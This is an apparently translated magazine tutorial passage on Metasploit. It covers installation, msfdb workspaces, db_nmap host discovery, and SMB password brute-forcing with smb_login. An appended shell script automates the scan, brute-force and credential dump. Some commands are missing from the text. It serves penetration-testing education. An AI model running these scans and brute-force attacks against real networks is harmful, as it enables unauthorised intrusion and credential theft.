The Metasploit Framework is the largest and best-known exploitation and post-exploitation framework there is. Even if you do not use it yourself, you have surely come across plenty of mentions of MSF in our articles. However, Xakep has never had an introductory article on it, or if it did, it was so long ago that it no longer counts. I will try to start from the very beginning, and along the way I will explain exactly how my team uses this framework and give various practical tips.
All information is provided for informational purposes only. Neither the editors nor the author are liable for any possible harm caused by the information in this article.
Install Metasploit Framework
In distributions intended for penetration testing (for example, Kali or Parrot OS), this product is either preinstalled or is easily installed with the following command:
apt install metasploit-framework
If you want to use the Metasploit Framework on, for example, Ubuntu, it can be installed with the official installer script from Rapid7's metasploit-omnibus repository. To do this, type the following commands in the console:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
sudo chmod 755 msfinstall
sudo ./msfinstall
The script is executed as root, so read it before running it.
Quite often Metasploit users have to attack networks containing a lot of hosts, and there comes a point when merely keeping track of everything you have found takes an unacceptably long time. That is when you start to appreciate the framework's ability to work with PostgreSQL: Metasploit can save and neatly structure the collected information thanks to its msfdb utility. To work with the database, start the postgresql service and create a database for Metasploit:
service postgresql start
msfdb init
You can check the connection to the database from the framework itself by running the command
To make it easier to work with different targets (hosts, networks or domains) and keep their data separate, msfdb supports so-called workspaces. Let's add a new workspace to our project.
> workspace -a xakep
Now we are working in the newly created workspace. Imagine that we are on the network 192.168.6.0/24. Let's look for live hosts in it. For this we will use Nmap, but launched from Metasploit and tied to the current database (db_nmap passes its arguments to Nmap and imports the results; note that -O, OS fingerprinting, requires root privileges):
> db_nmap -O 192.168.6.0/24
The Nmap output itself is not interesting to us: everything we need is stored in the database. For example, all scanned hosts are already there, and we can view them as a single list using the command
Along with the hosts, all discovered services were saved as well, and that list is now always at hand. We can see which services are listening on which ports, as well as the list of services for a specific host.
The msfdb database has a very handy feature: it saves all found credentials. I will come back to that function later; first a few words about the brute-force capabilities of the framework. A complete list of login modules for collecting credentials can be obtained with the following command (the -S flag filters the result rows by a regular expression):
> search type:auxiliary -S "_login"
Pay attention to SMB. To find out what a particular module is intended for and read its description (with references, for example to cvedetails), and also to see the options that must be set before running it, use the command
Let's select this module and set the domain name, the username, the host we are interested in and the password list.
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.6.129
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser root
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /home/ralf/tmp/pass.txt
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain DOMAIN
msf5 auxiliary(scanner/smb/smb_login) > run
If the user found turns out to be an administrator, Metasploit will tell us so, which is very convenient. Keep in mind that every failed attempt against a domain account counts toward the domain's lockout policy, so check the lockout threshold before feeding a long password list to a login module. But our network may contain a hundred machines or more, and many services are probably running on them. As a rule, a lot of credentials can be collected using nothing but the brute-force modules. Using msfdb means you do not waste time collecting all the logins, hashes and passwords by hand: they automatically land in the credential store, which can be viewed with the command
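The whole procedure above (database check, workspace, db_nmap, listing hosts and services, smb_login, dumping the credential store) can be written down as an msfconsole resource script and replayed with msfconsole -r. The script below is an added example, not code from the article or from the Metasploit project: it generates such a resource file from a few parameters. The workspace name, subnet, target host, SMB user and domain, and password-file path are hypothetical placeholders; the msfconsole commands it emits are the real ones.

```shell
#!/bin/sh
# Added example (not from the article or from Metasploit): generate an
# msfconsole resource script for the workflow described above and,
# optionally, hand it to msfconsole. Workspace, subnet, target, user,
# domain and password file are hypothetical placeholders.
set -e

# Print the resource-script text for the given parameters. Every line is a
# command msfconsole accepts verbatim, so it could also be typed interactively.
gen_rc() {
  ws="$1"; subnet="$2"; target="$3"; user="$4"; domain="$5"; pass_file="$6"
  cat <<EOF
# Generated by gen_rc; run with: msfconsole -q -r <this file>
db_status
workspace -a ${ws}
workspace ${ws}
# -O (OS fingerprinting) needs raw sockets: run msfconsole as root or drop it
db_nmap -O ${subnet}
hosts
services
# Read the module's description, references and options before touching the target
info auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS ${target}
set SMBUser ${user}
set SMBDomain ${domain}
set PASS_FILE ${pass_file}
# Stop at the first valid password instead of walking the whole list;
# failed attempts still count toward a domain lockout threshold
set STOP_ON_SUCCESS true
run
creds
exit
EOF
}

main() {
  rc="${TMPDIR:-/tmp}/msf_scan_$$.rc"
  gen_rc "${1:-xakep}" "${2:-192.168.6.0/24}" "${3:-192.168.6.129}" \
         "${4:-root}" "${5:-DOMAIN}" "${6:-/home/ralf/tmp/pass.txt}" > "$rc"
  echo "resource script written to $rc" >&2
  # Only launch msfconsole when explicitly asked, so the script is safe to
  # run on a box without Metasploit or without an authorised scan target.
  if [ "${RUN_MSF:-0}" = "1" ]; then
    msfconsole -q -r "$rc"
  else
    echo "run it with: msfconsole -q -r $rc" >&2
  fi
}

main "$@"
```

Invoke it as ./msf_scan.sh workspace subnet target user domain passfile to just write the resource file, or with RUN_MSF=1 in the environment to start msfconsole on it straight away. STOP_ON_SUCCESS comes from the AuthBrute mixin shared by the login scanners, so the same skeleton works for the other _login modules once the module path and its option names (SMBUser and SMBDomain are specific to smb_login) are swapped.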
Continuation is available only to participants